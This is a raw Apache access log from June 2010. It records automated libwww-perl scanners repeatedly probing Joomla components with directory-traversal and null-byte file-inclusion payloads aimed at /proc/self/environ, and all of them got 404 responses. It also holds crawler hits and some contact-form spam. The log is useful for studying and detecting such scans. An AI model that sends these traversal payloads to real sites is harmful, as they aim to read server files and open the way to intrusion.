173.192.222.68 - - [29/Jun/2010:06:34:32 -0500] "GET /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
173.192.222.68 - - [29/Jun/2010:06:34:33 -0500] "GET /logs/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
65.55.51.112 - - [29/Jun/2010:06:36:53 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.51.112 - - [29/Jun/2010:06:37:51 -0500] "GET /logs/access_log.1183248000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
194.126.234.29 - - [29/Jun/2010:06:41:03 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
194.126.234.29 - - [29/Jun/2010:06:41:03 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
194.126.234.29 - - [29/Jun/2010:06:41:03 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
194.126.234.29 - - [29/Jun/2010:06:41:03 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
194.126.234.29 - - [29/Jun/2010:06:41:03 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
194.126.234.29 - - [29/Jun/2010:06:41:03 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
194.126.234.29 - - [29/Jun/2010:06:41:03 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
194.126.234.29 - - [29/Jun/2010:06:41:03 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
194.126.234.29 - - [29/Jun/2010:06:41:03 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
87.250.252.241 - - [29/Jun/2010:06:42:58 -0500] "GET /logs/access_log.1262563200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
216.65.69.25 - - [29/Jun/2010:06:43:02 -0500] "GET /logs/access_log.1277424000/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
216.65.69.25 - - [29/Jun/2010:06:43:02 -0500] "GET /index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
216.65.69.25 - - [29/Jun/2010:06:43:02 -0500] "GET /logs/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
216.65.69.25 - - [29/Jun/2010:06:47:41 -0500] "GET /logs/access_log.1274054400/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:06:48:19 -0500] "GET /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:49:11 -0500] "GET /logs/access_log.1274572800//web2/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:49:12 -0500] "GET //web2/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:49:12 -0500] "GET /logs//web2/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:49:54 -0500] "GET //web2/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:49:59 -0500] "GET //web2/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:50:04 -0500] "GET //web2/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:50:12 -0500] "GET //web2/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:50:54 -0500] "GET /logs/access_log.1275091200//web2/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:50:55 -0500] "GET //web2/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:50:55 -0500] "GET /logs//web2/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.810"
62.182.63.49 - - [29/Jun/2010:06:51:29 -0500] "GET /logs/access_log.1276300800/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
62.182.63.49 - - [29/Jun/2010:06:51:29 -0500] "GET /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
62.182.63.49 - - [29/Jun/2010:06:51:29 -0500] "GET /logs/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
174.121.58.85 - - [29/Jun/2010:06:51:56 -0500] "GET /logs/access_log.1274918400//web2/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
207.46.199.199 - - [29/Jun/2010:06:52:05 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.121.58.85 - - [29/Jun/2010:06:53:03 -0500] "GET /logs/access_log.1274572800//web2/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:53:03 -0500] "GET //web2/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:53:03 -0500] "GET /logs//web2/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:53:33 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:53:34 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:53:34 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:53:34 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:53:34 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:53:34 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
62.182.63.49 - - [29/Jun/2010:06:53:48 -0500] "GET /logs/access_log.1276041600/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
174.121.58.85 - - [29/Jun/2010:06:54:05 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:54:05 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:54:05 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:54:19 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:54:34 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:54:43 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
195.66.157.210 - - [29/Jun/2010:06:54:52 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
195.66.157.210 - - [29/Jun/2010:06:54:54 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
174.121.58.85 - - [29/Jun/2010:06:54:54 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:55:04 -0500] "GET /logs/access_log.1274572800//web2/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:55:04 -0500] "GET //web2/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:55:04 -0500] "GET /logs//web2/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:55:04 -0500] "GET /logs/access_log.1274572800//web2/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:55:04 -0500] "GET //web2/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:55:04 -0500] "GET /logs//web2/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.810"
38.113.115.196 - - [29/Jun/2010:06:55:10 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
174.121.58.85 - - [29/Jun/2010:06:55:13 -0500] "GET /logs/access_log.1275091200//web2/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:55:13 -0500] "GET //web2/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:55:14 -0500] "GET /logs//web2/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:55:19 -0500] "GET /logs/access_log.1274918400//web2/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
38.113.115.196 - - [29/Jun/2010:06:55:24 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:06:55:32 -0500] "GET /logs/access_log.1277164800//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:06:55:32 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:06:55:33 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:06:55:33 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:06:55:37 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:06:55:38 -0500] "GET /logs/access_log.1277164800//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:06:55:38 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:06:55:38 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:06:55:55 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:06:56:06 -0500] "GET /logs/access_log.1277164800//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:06:56:06 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:06:56:06 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:06:56:11 -0500] "GET /logs/access_log.1277164800//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:06:56:11 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:06:56:12 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:06:56:34 -0500] "GET /logs/access_log.1277164800//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:06:56:35 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:06:56:35 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:06:56:38 -0500] "GET /logs/access_log.1277164800//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:06:56:38 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:06:56:38 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
174.121.58.85 - - [29/Jun/2010:06:56:41 -0500] "GET /logs/access_log.1277164800//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:56:42 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:56:42 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
195.66.157.210 - - [29/Jun/2010:06:56:45 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
195.66.157.210 - - [29/Jun/2010:06:56:45 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
195.66.157.210 - - [29/Jun/2010:06:56:45 -0500] "GET /logs/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
195.66.157.210 - - [29/Jun/2010:06:56:50 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
195.66.157.210 - - [29/Jun/2010:06:56:50 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
195.66.157.210 - - [29/Jun/2010:06:56:51 -0500] "GET /logs/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
174.121.58.85 - - [29/Jun/2010:06:56:51 -0500] "GET /logs/access_log.1275091200//web2/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:56:51 -0500] "GET /logs/access_log.1275091200//web2/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
38.113.115.196 - - [29/Jun/2010:06:57:16 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:06:57:23 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
207.46.13.94 - - [29/Jun/2010:06:57:24 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.121.58.85 - - [29/Jun/2010:06:57:52 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
38.113.115.196 - - [29/Jun/2010:06:57:55 -0500] "GET /logs/access_log.1277164800//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:06:57:56 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:06:57:56 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
207.46.13.94 - - [29/Jun/2010:06:57:58 -0500] "GET /logs/access_log.1266710400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.66.157.210 - - [29/Jun/2010:06:58:10 -0500] "GET /logs/access_log.1274832000/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
195.66.157.210 - - [29/Jun/2010:06:58:13 -0500] "GET /logs/access_log.1274832000/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
174.121.58.85 - - [29/Jun/2010:06:59:03 -0500] "GET /logs/access_log.1277164800//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:59:03 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:06:59:03 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
38.113.115.196 - - [29/Jun/2010:06:59:19 -0500] "GET /logs/access_log.1277164800//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:06:59:19 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:06:59:19 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:06:59:44 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:07:00:03 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
174.121.58.85 - - [29/Jun/2010:07:00:31 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:04:37 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:04:37 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:04:37 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:04:37 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
213.179.32.13 - - [29/Jun/2010:07:05:36 -0500] "GET /logs/access_log.1274918400//html.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.829"
213.179.32.13 - - [29/Jun/2010:07:05:36 -0500] "GET //html.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.829"
213.179.32.13 - - [29/Jun/2010:07:05:37 -0500] "GET /logs//html.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.829"
213.179.32.13 - - [29/Jun/2010:07:06:09 -0500] "GET /logs/access_log.1274918400//main1.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.829"
213.179.32.13 - - [29/Jun/2010:07:06:10 -0500] "GET //main1.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.829"
213.179.32.13 - - [29/Jun/2010:07:06:10 -0500] "GET /logs//main1.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.829"
174.121.176.46 - - [29/Jun/2010:07:06:21 -0500] "GET /logs/access_log.1274832000/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:06:21 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:06:21 -0500] "GET /logs/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:06:38 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:06:51 -0500] "GET /logs/access_log.1274832000/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:06:51 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:06:51 -0500] "GET /logs/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:07:08 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:07:12 -0500] "GET /logs/access_log.1274832000/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:07:12 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:07:12 -0500] "GET /logs/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:07:14 -0500] "GET /logs/access_log.1274832000/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:07:14 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
